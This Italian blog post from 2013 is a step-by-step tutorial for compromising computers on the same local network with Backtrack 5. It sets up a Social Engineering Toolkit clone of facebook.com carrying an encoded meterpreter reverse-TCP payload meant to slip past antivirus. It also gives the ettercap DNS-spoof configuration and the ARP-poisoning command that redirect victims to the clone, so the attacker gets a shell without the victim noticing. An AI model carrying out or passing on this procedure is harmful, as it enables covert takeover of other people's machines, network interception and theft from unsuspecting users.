lunedì 11 febbraio 2013

Payload Injection tramite Site cloning e Dns Spoofing con BT5

Oggi ragazzi, farò un breve guida sul come injectare un payload in un computer connesso sulla nostra stessa rete, usando il "Site cloning" e il "Dns spoofing" con Backtrack 5.
Quel che andremo a fare sarà configurare un exploit in modo che quando la vittima si connetterà ad un determinato sito scelto da noi, tramite il dns spoofing sarà redirectata al nostro local host, nel quale sarà preparato esattamente il sito che si aspetta, con la sola differenza, che nel sito sarà injectato il nostro payload, compresso e criptato per essere invisibile agli antivirus, che ci permetterà di avere il controllo del pc vittima, senza che questa si accorda di nulla.

Quel che ci serve, è tutto già compreso in BT 5 ed è il Social Engineering Toolkit, Metasploit ed Ettercap.
Apriamo SET e:

  • Spostiamoci in Social Engineering Attacks (1)->WebSite Attacks Vector(2)->Java Applet Attack Vector(1)->Site Cloner(2).
  • Scriviamo adesso il nostro LHost, il mio è 192.168.1.5.
  • Inseriamo l'indirizzo del sito da clonare, io metto "www.facebook.com".
  • Impostato la porta di ricezione (default:443)
  • Impostiamo il payload, di solito io uso meterpreter in reverse_tcp
  • Impostiamo il metodo di criptazione (usa l'msfencoder), nel multi encoding (15) [il 16 è anche meglio]
  • Adesso SET vi chiederà se inizializzare il listening sulla porta da voi scelta, tramite l'msfcli, dategli "yes"


Ora che abbiamo creato il sito con il payload sul nostro local host e abbiamo impostato l'ascolto sulla nostra porta, non bisognerà fare altro che redirectare la vittima con il dns spoofing al nostro lhost, tramite ettercap.
Quindi apriamo un terminale e digitiamo:

gedit /usr/local/share/ettercap/etter.dns

Ci si aprirà il file di configurazione dns di ettercap, nel quale dovremo impostare il sito origine e il sito destinazione, quindi spostiamoci in basso e scriviamo:

facebook.com A Lhost
*.facebook.com A Lhost 

Così adesso il plugin di dns spoofing di ettercap saprà cosa fare. Adesso possiamo procedere al redirecting tramite questo comando, che tramite un attacco MITM (se non sapete cos'è, l'ho trattato parecchio tempo fa QUA) farà ciò che noi vogliamo:

ettercap -Tqi wlan0 -P dns_spoof -M ARP // //

Farà tutto lui, lasciate fare e dimenticatevi di questo terminale. Tornate su SET e vedrete che appena la vittima aprirà il sito www.facebook.com, vi si aprirà la classica sessione di meterpreter, o la shell e quant'altro nel caso aveste scelto un altro payload.

Se vi è interessato l'articolo, continuate a seguirmi ogni settimana, perché penso che da qua in poi pubblicherò qualcosa in più sul pentesting.
Alla prossima
Pubblicato da alle
Etichette: ,

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)

Ti potrebbero anche interessare

Related Posts Plugin for WordPress, Blogger...